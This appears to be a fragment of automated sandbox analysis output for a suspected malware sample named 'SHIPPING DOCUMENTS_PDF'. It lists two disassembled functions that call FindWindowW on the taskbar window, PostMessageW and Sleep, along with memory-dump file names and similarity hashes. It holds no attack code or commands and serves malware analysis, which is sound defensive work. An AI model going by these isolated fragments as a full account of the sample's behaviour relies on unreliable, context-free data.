                                                                                    Function 00BD5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BD59AE
                                                                                    • PostMessageW.USER32(00000000), ref: 00BD59B5
                                                                                      • Part of subcall function 00BB5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB52BC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: 7d3b6ee2a4b2e82890288b473f05a1a47f57cc58cea6f5bd55af92b9e5f90436
                                                                                    • Instruction ID: c57dec13077628148c3b280427c63425869734b6139e0af1890d3f916be4ee82
                                                                                    • Opcode Fuzzy Hash: 7d3b6ee2a4b2e82890288b473f05a1a47f57cc58cea6f5bd55af92b9e5f90436
                                                                                    • Instruction Fuzzy Hash: 8CD0C9313863127BEA64BB70AC1BFE6A655BB14B50F040836B346AB1D0DDE0A800C658
                                                                                    Function 00BD5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BD596E
                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BD5981
                                                                                      • Part of subcall function 00BB5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB52BC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: 22db542f2a627c30a0674039e0b8cf433f97ca57b7f429359969414a52b969a1
                                                                                    • Instruction ID: 8f69f5b97d33bf3c161b63b9b85ab2f5661cb8f956bf7db0aca94365f5f5670e
                                                                                    • Opcode Fuzzy Hash: 22db542f2a627c30a0674039e0b8cf433f97ca57b7f429359969414a52b969a1
                                                                                    • Instruction Fuzzy Hash: BAD0C935389312B7EA64BB70AC2BFE6AA55BB10B50F040836B34AAB1D0DDE0A800C654